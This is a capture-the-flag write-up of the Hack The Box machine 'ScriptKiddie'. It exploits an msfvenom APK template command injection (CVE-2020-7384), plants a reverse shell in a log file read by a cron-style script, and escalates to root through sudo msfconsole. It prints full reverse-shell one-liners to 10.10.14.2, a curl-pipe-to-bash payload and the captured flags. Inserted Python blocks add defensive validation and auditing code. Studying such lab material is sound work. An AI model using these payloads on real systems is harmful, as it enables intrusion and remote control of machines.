ScriptKiddie-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: msfvenom APK template injection, writing a shell into a log file, privilege escalation via sudo msfconsole

Reference: https://0xdf.gitlab.io/2021/06/05/htb-scriptkiddie.html

Reference: https://medium.com/@joemcfarland/hack-the-box-scriptkiddie-writeup-af3a7634dc62

0x01 Getting user access

1. Get the target's IP address: 10.10.10.226

2. Check connectivity

┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.10.226 -c 4
PING 10.10.10.226 (10.10.10.226) 56(84) bytes of data.
64 bytes from 10.10.10.226: icmp_seq=2 ttl=63 time=283 ms
64 bytes from 10.10.10.226: icmp_seq=3 ttl=63 time=283 ms
64 bytes from 10.10.10.226: icmp_seq=4 ttl=63 time=281 ms

--- 10.10.10.226 ping statistics ---
4 packets transmitted, 3 received, 25% packet loss, time 3009ms
rtt min/avg/max/mdev = 280.706/282.376/283.415/1.192 ms

3. Enumerate open ports

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.226
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-24 09:36 CST
Nmap scan report for 10.10.10.226
Host is up (0.30s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
22,5000,
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,5000 -T4 --min-rate=5000 10.10.10.226
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-24 09:38 CST
Nmap scan report for 10.10.10.226
Host is up (0.28s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.42 seconds
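The grep/awk one-liner above pulls the open ports out of the grepable `-oG` file so they can be fed back to `nmap -p`. As an added example (not part of the original post), here is a small Python parser for the same `-oG` format that keeps the protocol and service name as well. `SAMPLE_OG` is constructed to match the shape of the `allports` file the scan above would produce; it is not copied from an actual file.

```python
"""Parse nmap grepable (-oG) output into open ports per host (added example)."""
import re
from typing import Dict, List, Tuple

# Constructed sample of nmap -oG output: same layout nmap writes, values taken
# from the scan shown on the page (22/ssh and 5000/upnp open, the rest closed).
SAMPLE_OG = """\
# Nmap 7.94SVN scan initiated Sun Dec 24 09:36:00 2023 as: nmap -p- --min-rate=10000 -oG allports 10.10.10.226
Host: 10.10.10.226 ()\tStatus: Up
Host: 10.10.10.226 ()\tPorts: 22/open/tcp//ssh///, 5000/open/tcp//upnp///\tIgnored State: closed (65533)
# Nmap done at Sun Dec 24 09:36:13 2023 -- 1 IP address (1 host up) scanned in 13.41 seconds
"""

# One port entry in the Ports: field looks like  22/open/tcp//ssh///
PORT_RE = re.compile(r"(\d+)/(open|closed|filtered|open\|filtered)/(tcp|udp)//([^/]*)///")


def parse_grepable(text: str, state: str = "open") -> Dict[str, List[Tuple[int, str, str]]]:
    """Return {host: [(port, proto, service), ...]} for every port in `state`."""
    result: Dict[str, List[Tuple[int, str, str]]] = {}
    for line in text.splitlines():
        # Only "Host:" lines that carry a "Ports:" field describe scan results.
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # The Ports: field runs up to the next tab-separated field.
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        found = [
            (int(port), proto, service)
            for port, port_state, proto, service in PORT_RE.findall(ports_field)
            if port_state == state
        ]
        if found:
            result.setdefault(host, []).extend(found)
    return result


def port_list(text: str, host: str) -> str:
    """Comma-joined open ports for `host`, the same string the grep/awk pipeline builds."""
    return ",".join(str(port) for port, _, _ in parse_grepable(text).get(host, []))


if __name__ == "__main__":
    print(port_list(SAMPLE_OG, "10.10.10.226"))
```

Compared with the grep pipeline, the parser keys results by host, so the same function works unchanged on a multi-host `-oG` file, and the trailing comma the `tr` step leaves behind never appears.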

4. Browsing to port 5000 shows a web front-end wrapping a few msf helper tools

5. After some testing, neither the ping function nor the searchsploit function can be abused to execute commands

6. The sploits function, however, turns up a vulnerability in one version of msfvenom

------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------ ---------------------------------
Metasploit Framework 6.0.11 - msfvenom APK template command injection | multiple/local/49491.py
------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

7. Combined with the msfvenom function in the middle of the page, this is most likely where the vulnerability lies

Certain versions of msfvenom are vulnerable to command injection through the APK template. Script Kiddie kindly provides a template upload feature for us.

8. On the local Kali machine, pull the exploit and use it to build the backdoored APK

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m multiple/local/49491.py
Exploit: Metasploit Framework 6.0.11 - msfvenom APK template command injection
URL: https://www.exploit-db.com/exploits/49491
Path: /usr/share/exploitdb/exploits/multiple/local/49491.py
Codes: CVE-2020-7384
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/桌面/49491.py

┌──(kali㉿kali)-[~/桌面]
└─$ touch shell.sh

┌──(kali㉿kali)-[~/桌面]
└─$ cat shell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.2/443 0>&1

┌──(kali㉿kali)-[~/桌面]
└─$ vim 49491.py

# Change me
payload = 'curl 10.10.14.2/shell.sh|bash'

┌──(kali㉿kali)-[~/桌面]
└─$ python3 49491.py
[+] Manufacturing evil apkfile
Payload: curl 10.10.14.2/shell.sh|bash
-dname: CN='|echo Y3VybCAxMC4xMC4xNC4yL3NoZWxsLnNofGJhc2g= | base64 -d | sh #

adding: empty (stored 0%)
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
正在为以下对象生成 2,048 位RSA密钥对和自签名证书 (SHA256withRSA) (有效期为 90 天):
CN="'|echo Y3VybCAxMC4xMC4xNC4yL3NoZWxsLnNofGJhc2g= | base64 -d | sh #"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
jar 已签名。

警告:
签名者证书为自签名证书。
为 -digestalg 选项指定的 SHA1 算法被视为存在安全风险而且被禁用。
为 -sigalg 选项指定的 SHA1withRSA 算法被视为存在安全风险而且被禁用。
检测到 POSIX 文件权限和/或 symlink 属性。这些属性在进行签名时会被忽略,不受该签名的保护。

[+] Done! apkfile is at /tmp/tmpba4cwkqa/evil.apk
Do: msfvenom -x /tmp/tmpba4cwkqa/evil.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null

9. The backdoored APK has been generated successfully

┌──(kali㉿kali)-[~/桌面]
└─$ ls -la /tmp/tmpba4cwkqa/
总计 16
drwx------ 2 kali kali 4096 12月24日 09:59 .
drwxrwxrwt 19 root root 4096 12月24日 09:59 ..
-rw-r--r-- 1 kali kali 0 12月24日 09:59 empty
-rw-r--r-- 1 kali kali 2007 12月24日 09:59 evil.apk
-rw-r--r-- 1 kali kali 2690 12月24日 09:59 signing.keystore

10. Start a local web server and listener, upload the APK, and obtain an initial shell

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.226 - - [24/Dec/2023 10:03:31] "GET /shell.sh HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.226] 43882
bash: cannot set terminal process group (894): Inappropriate ioctl for device
bash: no job control in this shell
kid@scriptkiddie:~/html$ id
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
kid@scriptkiddie:~/html$

11. Looking around the file system, we find the first flag

kid@scriptkiddie:~/html$ ls
ls
__pycache__
app.py
static
templates
kid@scriptkiddie:~/html$ ls -la /home/
ls -la /home/
total 16
drwxr-xr-x 4 root root 4096 Feb 3 2021 .
drwxr-xr-x 20 root root 4096 Feb 3 2021 ..
drwxr-xr-x 11 kid kid 4096 Feb 3 2021 kid
drwxr-xr-x 6 pwn pwn 4096 Feb 3 2021 pwn
kid@scriptkiddie:~/html$ ls -la /home/kid/
ls -la /home/kid/
total 60
drwxr-xr-x 11 kid kid 4096 Feb 3 2021 .
drwxr-xr-x 4 root root 4096 Feb 3 2021 ..
lrwxrwxrwx 1 root kid 9 Jan 5 2021 .bash_history -> /dev/null
-rw-r--r-- 1 kid kid 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 kid kid 3771 Feb 25 2020 .bashrc
drwxrwxr-x 3 kid kid 4096 Feb 3 2021 .bundle
drwx------ 2 kid kid 4096 Feb 3 2021 .cache
drwx------ 4 kid kid 4096 Feb 3 2021 .gnupg
drwxrwxr-x 3 kid kid 4096 Feb 3 2021 .local
drwxr-xr-x 9 kid kid 4096 Feb 3 2021 .msf4
-rw-r--r-- 1 kid kid 807 Feb 25 2020 .profile
drwx------ 2 kid kid 4096 Feb 10 2021 .ssh
-rw-r--r-- 1 kid kid 0 Jan 5 2021 .sudo_as_admin_successful
drwxrwxr-x 5 kid kid 4096 Feb 3 2021 html
drwxrwxrwx 2 kid kid 4096 Feb 3 2021 logs
drwxr-xr-x 3 kid kid 4096 Feb 3 2021 snap
-r-------- 1 kid kid 33 Dec 24 01:35 user.txt
kid@scriptkiddie:~/html$ cat /home/kid/user.txt
cat /home/kid/user.txt
b5ff36031c788d02d4253281be9cc233

0x02 Getting root

12. Checking with sudo -l shows we have no usable sudo rights as this user

kid@scriptkiddie:~/html$ sudo -l
sudo -l
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
kid@scriptkiddie:~/html$

13. But there is another user, pwn, and we can read a script in that user's home directory

kid@scriptkiddie:~/html$ ls -la /home/pwn
ls -la /home/pwn
total 44
drwxr-xr-x 6 pwn pwn 4096 Feb 3 2021 .
drwxr-xr-x 4 root root 4096 Feb 3 2021 ..
lrwxrwxrwx 1 root root 9 Feb 3 2021 .bash_history -> /dev/null
-rw-r--r-- 1 pwn pwn 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 pwn pwn 3771 Feb 25 2020 .bashrc
drwx------ 2 pwn pwn 4096 Jan 28 2021 .cache
drwxrwxr-x 3 pwn pwn 4096 Jan 28 2021 .local
-rw-r--r-- 1 pwn pwn 807 Feb 25 2020 .profile
-rw-rw-r-- 1 pwn pwn 74 Jan 28 2021 .selected_editor
drwx------ 2 pwn pwn 4096 Feb 10 2021 .ssh
drwxrw---- 2 pwn pwn 4096 Dec 24 02:00 recon
-rwxrwxr-- 1 pwn pwn 250 Jan 28 2021 scanlosers.sh
kid@scriptkiddie:~/html$ cat /home/pwn/scanlosers.sh
cat /home/pwn/scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
kid@scriptkiddie:~/html$

14. From the script (and the referenced writeups), whatever is written to the log file ends up inside the command the script executes, so we write a reverse shell into the log file

kid@scriptkiddie:~/html$ echo "x x x 127.0.0.1; bash -c 'bash -i >& /dev/tcp/10.10.14.2/10086 0>&1' # ."  > /home/kid/logs/hackers
<.10.14.2/10086 0>&1' # ." > /home/kid/logs/hackers
kid@scriptkiddie:~/html$
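Both injections in this writeup share one root cause: an attacker-controlled string (the APK signer's CN in step 8, everything after the second space of a `hackers` log line in step 14) is spliced into a command string that a shell then parses. The Python below is an added example written from the defender's side, not code from the page, from msfvenom or from the box. It shows the validation and argv-list construction that would have blocked both inputs, plus a detection pass over the log. The `INJECTED_*` strings are copied from the session above, `BENIGN_LOG_LINE` is constructed, and the keytool flag subset and the CN allow-list pattern are assumptions for illustration.

```python
"""Validate untrusted values before they reach a shell (added example).

Covers the two injection points of this writeup: the APK signer CN that
msfvenom's template handling passes to keytool (step 8) and the log line that
scanlosers.sh hands to `sh -c "nmap ... ${ip}"` (step 14).
"""
import ipaddress
import re
import shlex
import subprocess
from typing import List, Optional

# Attacker-controlled inputs copied from the session above.
INJECTED_CN = "'|echo Y3VybCAxMC4xMC4xNC4yL3NoZWxsLnNofGJhc2g= | base64 -d | sh #"
INJECTED_LOG_LINE = "x x x 127.0.0.1; bash -c 'bash -i >& /dev/tcp/10.10.14.2/10086 0>&1' # ."
# Constructed benign line in the same "two fields, then the IP" layout the script cuts.
BENIGN_LOG_LINE = "2023-12-24T02:00:00 hit 10.10.14.2"

# Characters that end a double-quoted shell string or start a new command.
SHELL_META = re.compile(r"[;&|`$<>(){}\\'\"\n]")
# Conservative allow-list for a certificate CN (assumption: letters, digits, space . _ -).
CN_ALLOWED = re.compile(r"[A-Za-z0-9 ._-]{1,64}")


def cn_is_safe(cn: str) -> bool:
    """True only if the CN matches the allow-list; the injected CN fails on its quote."""
    return CN_ALLOWED.fullmatch(cn) is not None


def extract_ip(line: str) -> Optional[str]:
    """Same field split as `cut -d' ' -f3-`, but the remainder must parse as an IP."""
    fields = line.split(" ", 2)
    if len(fields) < 3:
        return None
    try:
        return str(ipaddress.ip_address(fields[2]))
    except ValueError:
        return None


def suspicious_log_lines(log_text: str) -> List[str]:
    """Detection side: lines whose IP field carries shell metacharacters."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split(" ", 2)
        if len(fields) == 3 and SHELL_META.search(fields[2]):
            hits.append(line)
    return hits


def build_keytool_argv(cn: str) -> List[str]:
    """argv for keytool; the CN is one element and is never re-parsed by a shell.
    Flag subset is illustrative (assumed); the CN check runs before anything else."""
    if not cn_is_safe(cn):
        raise ValueError("certificate CN rejected: %r" % cn)
    return ["keytool", "-genkey", "-alias", "signing", "-dname", "CN=" + cn]


def build_nmap_argv(line: str) -> Optional[List[str]]:
    """Hardened replacement for the `sh -c "nmap ... ${ip}"` line in scanlosers.sh."""
    ip = extract_ip(line)
    if ip is None:
        return None
    return ["nmap", "--top-ports", "10", "-oN", "recon/%s.nmap" % ip, ip]


def shell_string(argv: List[str]) -> str:
    """If a shell is unavoidable, quote every element so metacharacters stay literal."""
    return " ".join(shlex.quote(a) for a in argv)


def run(argv: List[str]) -> subprocess.CompletedProcess:
    """Execute without a shell: list elements are arguments, never commands."""
    return subprocess.run(argv, shell=False, check=False, capture_output=True, text=True)


if __name__ == "__main__":
    print(build_nmap_argv(BENIGN_LOG_LINE))
    print(build_nmap_argv(INJECTED_LOG_LINE))
    print(suspicious_log_lines(INJECTED_LOG_LINE + "\n" + BENIGN_LOG_LINE))
```

The order matters: validate first (`ipaddress.ip_address` rejects anything that is not a bare address, the CN allow-list rejects the quote), then build an argv list and run it with `shell=False`. `shell_string` is the fallback when a shell really is required; `shlex.quote` turns the injected payload into a single literal argument instead of a second command. The `suspicious_log_lines` check is the detection counterpart: on this box it would have flagged the `hackers` line the moment it was written.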

15. The listener catches the connection and we have a shell as pwn

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.226] 57008
bash: cannot set terminal process group (868): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ id
id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)
pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
pwn@scriptkiddie:~$

16. pwn can run msfconsole as root, so escalation is straightforward

pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
sudo /opt/metasploit-framework-6.0.9/msfconsole


. .
.

dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
' dB' BBP
dB'dB'dB' dBBP dBP dBP BB
dB'dB'dB' dBP dBP dBP BB
dB'dB'dB' dBBBBP dBP dBBBBBBB

dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
. . dB' dBP dB'.BP
| dBP dBBBB' dBP dB'.BP dBP dBP
--o-- dBP dBP dBP dB'.BP dBP dBP
| dBBBBP dBP dBBBBP dBBBBP dBP dBP

.
.
o To boldly go where no
shell has gone before


=[ metasploit v6.0.9-dev ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

Metasploit tip: Save the current environment with the save command, future console restarts will use this environment again

stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > irb
stty: 'standard input': Inappropriate ioctl for device
[*] Starting IRB shell...
[*] You are in the "framework" object

system("/bin/bash")
Switch to inspect mode.
irb: warn: can't alias jobs from irb_jobs.
>>
>> system("/bin/bash")
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
e87e72d245999bb267a776496513cf29
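The `(root) NOPASSWD: .../msfconsole` rule is what makes the last step trivial: msfconsole ships an `irb` console, and any tool that hands the user an interpreter as root is a complete escalation. As an added example (not from the page), the Python below parses `sudo -l` output and flags passwordless rules on such tools, the check an administrator would run before granting a rule like this one. `SAMPLE_SUDO_L` copies the output shown for pwn above; `SHELL_CAPABLE` is an assumed, illustrative list.

```python
"""Flag passwordless sudo rules on tools that can hand the user an interpreter.

Added example for this writeup; not code from the page. SAMPLE_SUDO_L copies
the `sudo -l` output shown for user pwn. SHELL_CAPABLE is an assumed list of
programs that can run arbitrary commands from inside (msfconsole through its
irb console, as the writeup demonstrates).
"""
import os
import re
from typing import Dict, List, Set

SAMPLE_SUDO_L = """\
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
"""

# Assumed list: each exposes a shell or interpreter to whoever is driving it.
SHELL_CAPABLE: Set[str] = {
    "msfconsole", "irb", "ruby", "python", "python3", "perl",
    "vim", "vi", "nano", "less", "more", "man", "bash", "sh",
}

# "(root) NOPASSWD: /path/cmd args, /other/cmd" -> runas, tags, command list
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_rules(sudo_l_output: str) -> List[Dict]:
    """Return one dict per command from the 'may run the following commands' block."""
    rules: List[Dict] = []
    in_commands = False
    for line in sudo_l_output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        match = RULE_RE.match(line)
        if not match:
            continue
        tags = set(re.findall(r"([A-Z]+):", match.group("tags")))
        # sudo -l separates several commands in one rule with ", "
        for cmd in match.group("cmds").split(", "):
            rules.append({"runas": match.group("runas").strip(), "tags": tags, "cmd": cmd.strip()})
    return rules


def risky_rules(sudo_l_output: str) -> List[Dict]:
    """NOPASSWD rules whose binary is shell-capable, or that allow ALL."""
    flagged = []
    for rule in parse_rules(sudo_l_output):
        binary = os.path.basename(rule["cmd"].split()[0])
        if "NOPASSWD" in rule["tags"] and (binary in SHELL_CAPABLE or rule["cmd"] == "ALL"):
            flagged.append(rule)
    return flagged


if __name__ == "__main__":
    for rule in risky_rules(SAMPLE_SUDO_L):
        print("RISKY: (%s) %s" % (rule["runas"], rule["cmd"]))
```

On this box the audit returns exactly the msfconsole rule. The practical fix is the usual one: if pwn really needs msfconsole, it should run as pwn, not as root, and root-only tasks should be wrapped in a non-interactive script that takes no user-controlled arguments.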

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/314


https://sh1yan.top/2023/12/23/ScriptKiddie-htb-writeup/
Author: shiyan
Published: 2023-12-23